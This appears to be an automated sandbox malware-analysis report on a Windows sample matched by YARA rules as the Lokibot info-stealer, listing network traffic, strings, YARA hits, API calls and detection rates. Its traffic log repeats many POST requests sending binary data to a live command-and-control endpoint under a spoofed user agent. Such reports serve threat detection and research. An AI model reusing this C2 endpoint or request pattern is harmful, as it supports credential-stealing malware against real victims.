                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: unknownHTTPS traffic detected: 172.67.197.219:443 -> 192.168.2.5:49692 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00404ED4 recv,
                Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-0E44846E8DBE171CF83840F8DBF160DC.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpooldabestteamoftheworld.comConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: liverpooldabestteamoftheworld.com
                Source: unknownHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 192Connection: close
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513547746.0000000000E08000.00000004.00000020.sdmpString found in binary or memory: http://87.251.79.157/m0ha/0/pin.php
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513547746.0000000000E08000.00000004.00000020.sdmpString found in binary or memory: http://87.251.79.157/m0ha/0/pin.phpP
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmpString found in binary or memory: http://liverpooldabestteamoftheworld.com
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmpString found in binary or memory: http://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://liverpooldabestteamoftheworld.com4
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 0_2_0303B8B0 NtSetInformationThread,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 0_2_0303C500 NtSetInformationThread,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 0_2_03032D68
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_0040549C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_004029D4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: String function: 00405B6F appears 42 times
                Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 2120
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297407601.0000000000ACC000.00000002.00020000.sdmpBinary or memory string: OriginalFilename0 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSjFH BCy.exe2 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.303302144.00000000061A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.298842318.0000000003060000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.303627441.0000000006290000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.303627441.0000000006290000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.301794257.0000000004B44000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.298818235.0000000003050000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000000.262146939.000000000069C000.00000002.00020000.sdmpBinary or memory string: OriginalFilename0 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.512639003.00000000004A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameSjFH BCy.exe2 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeBinary or memory string: OriginalFilename0 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/7@2/3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile created: C:\Users\user\AppData\Local\?????????_Inc
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_01
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2576
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8B4.tmp
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeVirustotal: Detection: 42%
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeReversingLabs: Detection: 17%
